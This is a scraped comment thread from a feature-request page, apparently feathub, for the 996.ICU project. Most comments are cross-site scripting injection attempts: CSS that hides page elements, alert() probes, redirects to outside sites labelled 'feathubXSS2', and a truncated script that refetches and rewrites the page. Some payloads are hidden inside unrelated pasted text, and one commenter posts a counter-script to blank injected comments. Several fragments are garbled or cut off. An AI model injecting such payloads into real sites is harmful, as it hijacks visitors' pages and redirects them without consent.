LinXueyuanStdio/996.ICU

猎聘网

yanglu1019 asked for this feature 7 months ago — 11 comments

yanglu1019 commented 7 months ago

img,svg,table{visibility: collapse;}window.onload=function(){var commentBodySet = document.getElementsByClassName("body");for(var i=1;i

ostopuro commented 7 months ago

非996工作机会介绍群↑↑↑

zx1013196355 commented 7 months ago

alert("是这样玩的么?");

luckMyLief commented 7 months ago

alert('试试');

pangjunpeng commented 7 months ago

window.location.href="https://www.baidu.com"

luckMyLief commented 7 months ago

alert('来自easyswoole问候')

superzmy commented 7 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

| pws019 commented 7 months ago

怎么都是空评论?

guotao commented 6 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

zhdngshukai commented 6 months ago

1

guotao commented 6 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

Join the discussion!

Sign-in with GitHub to comment